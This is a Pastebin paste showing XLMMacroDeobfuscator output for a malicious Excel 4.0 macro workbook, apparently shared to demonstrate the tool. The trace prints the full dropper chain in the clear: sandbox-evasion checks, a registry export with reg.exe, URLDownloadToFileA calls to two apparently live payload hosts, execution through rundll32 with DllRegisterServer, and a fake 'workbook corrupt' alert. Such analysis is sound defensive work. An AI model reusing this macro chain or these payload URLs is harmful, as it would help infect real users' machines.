API tools faq
paste
Advertisement
dissectmalware

Deobfuscate XLS by automatically guessing the DAY(NOW())

dissectmalware
May 26th, 2020
358
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.59 KB | None | 0 0
raw download clone embed print report
  1. _ _______
  2. |\ /|( \ ( )
  3. ( \ / )| ( | () () |
  4. \ (_) / | | | || || |
  5. ) _ ( | | | |(_)| |
  6. / ( ) \ | | | | | |
  7. ( / \ )| (____/\| ) ( |
  8. |/ \|(_______/|/ \|
  9. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  10. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  11. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  12. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  13. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  14. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  15. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  16. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  17.  
  18.  
  19. XLMMacroDeobfuscator(v 0.1.4) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  20.  
  21. File: C:\Users\user\Downloads\ea0268aed69cd2bd3a13c07752fa45be8ff07a0fe78b8f7b6b381f1476ad8068.xls
  22.  
  23. [Loading Cells]
  24. auto_open: auto_open->9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!$FH$49024
  25. [Starting Deobfuscation]
  26. CELL:FH49024 , FullEvaluation , SET.VALUE(GZ34749,236)
  27. CELL:FH49025 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!AB31575)
  28. CELL:AB31575 , FullEvaluation , SET.VALUE(GA65402,211.875)
  29. CELL:AB31576 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!CW39913)
  30. CELL:CW39913 , FullEvaluation , SET.VALUE(EV50779,334)
  31. CELL:CW39914 , FullEvaluation , GOTO(BT20806)
  32. CELL:BT20806 , FullEvaluation , SET.VALUE(HC57576,302)
  33. CELL:BT20807 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HF25027)
  34. CELL:HF25027 , FullEvaluation , SET.VALUE(BV11787,117)
  35. CELL:HF25028 , FullEvaluation , GOTO(U64895)
  36. CELL:U64895 , FullEvaluation , SET.VALUE(DJ10105,116)
  37. CELL:U64896 , FullEvaluation , GOTO(AZ26863)
  38. CELL:AZ26863 , FullEvaluation , SET.VALUE(DN42674,-35.75)
  39. CELL:AZ26864 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!BM901)
  40. CELL:BM901 , FullEvaluation , SET.VALUE(AO12768,-1027.5)
  41. CELL:BM902 , FullEvaluation , GOTO(P38128)
  42. CELL:P38128 , FullEvaluation , SET.VALUE(AZ43693,-164)
  43. CELL:P38129 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!BL29717)
  44. CELL:BL29717 , FullEvaluation , SET.VALUE(CK27344,-435)
  45. CELL:BL29718 , FullEvaluation , GOTO(FI19111)
  46. CELL:FI19111 , FullEvaluation , SET.VALUE(EX42303,290)
  47. CELL:FI19112 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!CK8252)
  48. CELL:CK8252 , FullEvaluation , SET.VALUE(IC64694,-764)
  49. CELL:CK8253 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HJ54663)
  50. CELL:HJ54663 , FullEvaluation , SET.VALUE(E44515,-468)
  51. CELL:HJ54664 , FullEvaluation , GOTO(GD55986)
  52. CELL:GD55986 , FullEvaluation , SET.VALUE(FK63376,486)
  53. CELL:GD55987 , FullEvaluation , GOTO(HB43627)
  54. CELL:HB43627 , FullEvaluation , SET.VALUE(EL29677,40.25)
  55. CELL:HB43628 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!EN29618)
  56. CELL:EN29618 , FullEvaluation , SET.VALUE(IU47295,400)
  57. CELL:EN29619 , FullEvaluation , GOTO(U45293)
  58. CELL:U45293 , FullEvaluation , SET.VALUE(BA22911,-154.5)
  59. CELL:U45294 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!CV54814)
  60. CELL:CV54814 , FullEvaluation , SET.VALUE(IF27108,196)
  61. CELL:CV54815 , FullEvaluation , GOTO(EO28948)
  62. CELL:EO28948 , FullEvaluation , SET.VALUE(BF54715,72)
  63. CELL:EO28949 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!DL56436)
  64. CELL:DL56436 , FullEvaluation , SET.VALUE(S9586,397)
  65. CELL:DL56437 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!GO5178)
  66. CELL:GO5178 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",GE58394)
  67. CELL:GO5179 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!GG53123)
  68. CELL:GG53123 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",AC38734)
  69. CELL:GG53124 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!IQ65374)
  70. CELL:IQ65374 , FullEvaluation , FORMULA("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",CF32458)
  71. CELL:IQ65375 , FullEvaluation , GOTO(IU37347)
  72. CELL:IU37347 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",GH50257)
  73. CELL:IU37348 , FullEvaluation , GOTO(GZ6455)
  74. CELL:GZ6455 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)",IH33823)
  75. CELL:GZ6456 , FullEvaluation , GOTO(IE48886)
  76. CELL:IE48886 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)",DE64447)
  77. CELL:IE48887 , FullEvaluation , GOTO(DL53198)
  78. CELL:DL53198 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,CLOSE(TRUE))",IB38985)
  79. CELL:DL53199 , FullEvaluation , GOTO(DQ63210)
  80. CELL:DQ63210 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,CLOSE(TRUE))",FC47525)
  81. CELL:DQ63211 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!IH10377)
  82. CELL:IH10377 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,CLOSE(TRUE))",IA57959)
  83. CELL:IH10378 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HS61022)
  84. CELL:HS61022 , FullEvaluation , FORMULA("=""EXPORT HKCU\Software\Microsoft\Office\""",DC59054)
  85. CELL:HS61023 , FullEvaluation , GOTO(HH5373)
  86. CELL:HH5373 , FullEvaluation , FORMULA("=""C:\Users\Public\62sg03z.reg""",IC44493)
  87. CELL:HH5374 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!DF39200)
  88. CELL:DF39200 , FullEvaluation , FORMULA("=R[44281]C[11]&GET.WORKSPACE(2)&""\Excel\Security ""&R[29720]C[141]&"" /y""",CR14773)
  89. CELL:DF39201 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!ED24752)
  90. CELL:ED24752 , FullEvaluation , FORMULA("=""C:\Windows\system32\reg.exe""",G59977)
  91. CELL:ED24753 , FullEvaluation , GOTO(ED40112)
  92. CELL:ED40112 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[57410]C[-93],R[12206]C[-4],0,5)",CV2567)
  93. CELL:ED40113 , FullEvaluation , GOTO(HI45029)
  94. CELL:HI45029 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R[7961]C[193])))",AR36532)
  95. CELL:HI45030 , FullEvaluation , GOTO(CA62811)
  96. CELL:CA62811 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",AR36533)
  97. CELL:CA62812 , FullEvaluation , GOTO(ID59587)
  98. CELL:ID59587 , FullEvaluation , FORMULA("=NEXT()",AR36534)
  99. CELL:ID59588 , FullEvaluation , GOTO(GW10338)
  100. CELL:GW10338 , FullEvaluation , FORMULA("=""http://xn--80agatbmcgncccbd9andd6w.xn--p1ai/wp-smart.php""",HB20930)
  101. CELL:GW10339 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!CB54789)
  102. CELL:CB54789 , FullEvaluation , FORMULA("=""http://ekhobrand.com/wp-smart.php""",CK63296)
  103. CELL:CB54790 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!IG57205)
  104. CELL:IG57205 , FullEvaluation , FORMULA("=FOPEN(R[28537]C[-9])",IL15956)
  105. CELL:IG57206 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HY35963)
  106. CELL:HY35963 , FullEvaluation , FORMULA("=FPOS(R[-26252]C[68],215)",FV42208)
  107. CELL:HY35964 , FullEvaluation , GOTO(CG48001)
  108. CELL:CG48001 , FullEvaluation , FORMULA("=FREAD(R[-6791]C[39],255)",GY22747)
  109. CELL:CG48002 , FullEvaluation , GOTO(EA7566)
  110. CELL:EA7566 , FullEvaluation , FORMULA("=FCLOSE(R[-27498]C[33])",HE43454)
  111. CELL:EA7567 , FullEvaluation , GOTO(BO62857)
  112. CELL:BO62857 , FullEvaluation , FORMULA("=FILE.DELETE(R[-966]C[-17])",IT45459)
  113. CELL:BO62858 , FullEvaluation , GOTO(HT60327)
  114. CELL:HT60327 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[-12384]C[103])),CLOSE(FALSE),)",CZ35131)
  115. CELL:HT60328 , FullEvaluation , GOTO(GS13611)
  116. CELL:GS13611 , FullEvaluation , FORMULA("=""C:\Users\Public\hhEMc6.html""",HV31307)
  117. CELL:GS13612 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!IP29050)
  118. CELL:IP29050 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-18278]C[-51],R[-19429]C[95],0,0)",EE50736)
  119. CELL:IP29051 , FullEvaluation , GOTO(DW56142)
  120. CELL:DW56142 , FullEvaluation , FORMULA("=FILES(R[29810]C[86])",EN1497)
  121. CELL:DW56143 , FullEvaluation , GOTO(M62520)
  122. CELL:M62520 , FullEvaluation , FORMULA("=IF(ISERROR(R[818]C[81]),CLOSE(FALSE),)",BK679)
  123. CELL:M62521 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!Y47838)
  124. CELL:Y47838 , FullEvaluation , FORMULA("=""C:\Users\Public\nzjB.html""",GO34148)
  125. CELL:Y47839 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!BF49093)
  126. CELL:BF49093 , FullEvaluation , FORMULA("=R[24818]C[106]&"",DllRegisterServer""",CM9330)
  127. CELL:BF49094 , FullEvaluation , GOTO(IQ22082)
  128. CELL:IQ22082 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[10964]C[104],R[24182]C[91],0,0)",DB9966)
  129. CELL:IQ22083 , FullEvaluation , GOTO(IL4450)
  130. CELL:IL4450 , FullEvaluation , FORMULA("=FILES(R[-21011]C[169])",AB55159)
  131. CELL:IL4451 , FullEvaluation , GOTO(CW20424)
  132. CELL:CW20424 , FullEvaluation , FORMULA("=IF(ISERROR(R[21824]C[-126]),,RUN(R[186]C[-126]))",EX33335)
  133. CELL:CW20425 , FullEvaluation , GOTO(L47582)
  134. CELL:L47582 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[32087]C[-126],R[2939]C[-18],0,0)",HG31209)
  135. CELL:L47583 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!K13075)
  136. CELL:K13075 , FullEvaluation , FORMULA("=ALERT(R[24873]C[159],2)",AB33521)
  137. CELL:K13076 , FullEvaluation , GOTO(FV25832)
  138. CELL:FV25832 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[30329]C[-187],R[925]C[-125],0,5)",HH8405)
  139. CELL:FV25833 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!BE2550)
  140. CELL:BE2550 , FullEvaluation , FORMULA("=CLOSE(FALSE)",B23780)
  141. CELL:BE2551 , FullEvaluation , GOTO(GE58394)
  142. CELL:GE58394 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  143. CELL:GE58395 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!AC38734)
  144. CELL:AC38734 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  145. CELL:AC38735 , FullEvaluation , GOTO(CF32458)
  146. CELL:CF32458 , FullEvaluation , "https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates"
  147. CELL:CF32459 , FullEvaluation , GOTO(GH50257)
  148. CELL:GH50257 , PartialEvaluation , APP.MAXIMIZE()
  149. CELL:GH50258 , FullEvaluation , GOTO(IH33823)
  150. CELL:IH33823 , FullEvaluation , IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
  151. CELL:IH33824 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!DE64447)
  152. CELL:DE64447 , FullEvaluation , IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)
  153. CELL:DE64448 , FullEvaluation , GOTO(IB38985)
  154. CELL:IB38985 , FullEvaluation , IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  155. CELL:IB38986 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!FC47525)
  156. CELL:FC47525 , FullEvaluation , IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  157. CELL:FC47526 , FullEvaluation , GOTO(IA57959)
  158. CELL:IA57959 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE))
  159. CELL:IA57959 , FullEvaluation , [TRUE]
  160. CELL:IA57960 , FullEvaluation , GOTO(DC59054)
  161. CELL:DC59054 , FullEvaluation , "EXPORT HKCU\Software\Microsoft\Office\"
  162. CELL:DC59055 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!IC44493)
  163. CELL:IC44493 , FullEvaluation , "C:\Users\Public\62sg03z.reg"
  164. CELL:IC44494 , FullEvaluation , GOTO(CR14773)
  165. CELL:CR14773 , FullEvaluation , "EXPORT HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security C:\Users\Public\62sg03z.reg /y"
  166. CELL:CR14774 , FullEvaluation , GOTO(G59977)
  167. CELL:G59977 , FullEvaluation , "C:\Windows\system32\reg.exe"
  168. CELL:G59978 , FullEvaluation , GOTO(CV2567)
  169. CELL:CV2567 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security C:\Users\Public\62sg03z.reg /y",0,5)
  170. CELL:CV2568 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!AR36532)
  171. CELL:AR36532 , PartialEvaluation , WHILE(ISERROR(FILES(R[7961]C[193])))
  172. CELL:AR36535 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HB20930)
  173. CELL:HB20930 , FullEvaluation , "http://xn--80agatbmcgncccbd9andd6w.xn--p1ai/wp-smart.php"
  174. CELL:HB20931 , FullEvaluation , GOTO(CK63296)
  175. CELL:CK63296 , FullEvaluation , "http://ekhobrand.com/wp-smart.php"
  176. CELL:CK63297 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!IL15956)
  177. CELL:IL15956 , PartialEvaluation , FOPEN("C:\Users\Public\62sg03z.reg")
  178. CELL:IL15957 , FullEvaluation , GOTO(FV42208)
  179. CELL:FV42208 , PartialEvaluation , FPOS("FOPEN(""C:\Users\Public\62sg03z.reg"")",215)
  180. CELL:FV42209 , FullEvaluation , GOTO(GY22747)
  181. CELL:GY22747 , PartialEvaluation , FREAD("FOPEN(""C:\Users\Public\62sg03z.reg"")",255)
  182. CELL:GY22748 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HE43454)
  183. CELL:HE43454 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\62sg03z.reg"")")
  184. CELL:HE43455 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!IT45459)
  185. CELL:IT45459 , PartialEvaluation , FILE.DELETE("C:\Users\Public\62sg03z.reg")
  186. CELL:IT45460 , FullEvaluation , GOTO(CZ35131)
  187. CELL:CZ35131 , FullBranching , IF(ISNUMBER(SEARCH("0001",R[-12384]C[103])),CLOSE(FALSE),)
  188. CELL:CZ35131 , End , [TRUE] CLOSE(FALSE)
  189. CELL:CZ35131 , FullEvaluation , [FALSE]
  190. CELL:CZ35132 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HV31307)
  191. CELL:HV31307 , FullEvaluation , "C:\Users\Public\hhEMc6.html"
  192. CELL:HV31308 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!EE50736)
  193. CELL:EE50736 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates","C:\Users\Public\hhEMc6.html",0,0)
  194. CELL:EE50737 , FullEvaluation , GOTO(EN1497)
  195. CELL:EN1497 , PartialEvaluation , FILES("C:\Users\Public\hhEMc6.html")
  196. CELL:EN1498 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!BK679)
  197. CELL:BK679 , FullBranching , IF(ISERROR(R[818]C[81]),CLOSE(FALSE),)
  198. CELL:BK679 , End , [TRUE] CLOSE(FALSE)
  199. CELL:BK679 , FullEvaluation , [FALSE]
  200. CELL:BK680 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!GO34148)
  201. CELL:GO34148 , FullEvaluation , "C:\Users\Public\nzjB.html"
  202. CELL:GO34149 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!CM9330)
  203. CELL:CM9330 , FullEvaluation , "C:\Users\Public\nzjB.html,DllRegisterServer"
  204. CELL:CM9331 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!DB9966)
  205. CELL:DB9966 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://xn--80agatbmcgncccbd9andd6w.xn--p1ai/wp-smart.php","C:\Users\Public\nzjB.html",0,0)
  206. CELL:DB9967 , FullEvaluation , GOTO(AB55159)
  207. CELL:AB55159 , PartialEvaluation , FILES("C:\Users\Public\nzjB.html")
  208. CELL:AB55160 , FullEvaluation , GOTO(EX33335)
  209. CELL:EX33335 , FullBranching , IF(ISERROR(R[21824]C[-126]),,RUN(R[186]C[-126]))
  210. CELL:EX33335 , FullEvaluation , [TRUE]
  211. CELL:EX33336 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HG31209)
  212. CELL:HG31209 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://ekhobrand.com/wp-smart.php","C:\Users\Public\nzjB.html",0,0)
  213. CELL:HG31210 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!AB33521)
  214. CELL:AB33521 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  215. CELL:AB33522 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HH8405)
  216. CELL:HH8405 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\nzjB.html,DllRegisterServer",0,5)
  217. CELL:HH8406 , FullEvaluation , GOTO(B23780)
  218. CELL:B23780 , End , CLOSE(FALSE)
  219. CELL:EX33335 , FullEvaluation , [FALSE] RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!AB33521)
  220. CELL:AB33521 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  221. CELL:AB33522 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HH8405)
  222. CELL:HH8405 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\nzjB.html,DllRegisterServer",0,5)
  223. CELL:HH8406 , FullEvaluation , GOTO(B23780)
  224. CELL:B23780 , End , CLOSE(FALSE)
  225. CELL:IA57959 , End , [FALSE] CLOSE(TRUE)
  226. [Day of Month] 5
  227. [END of Deobfuscation]
  228. time elapsed: 5.007885694503784
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!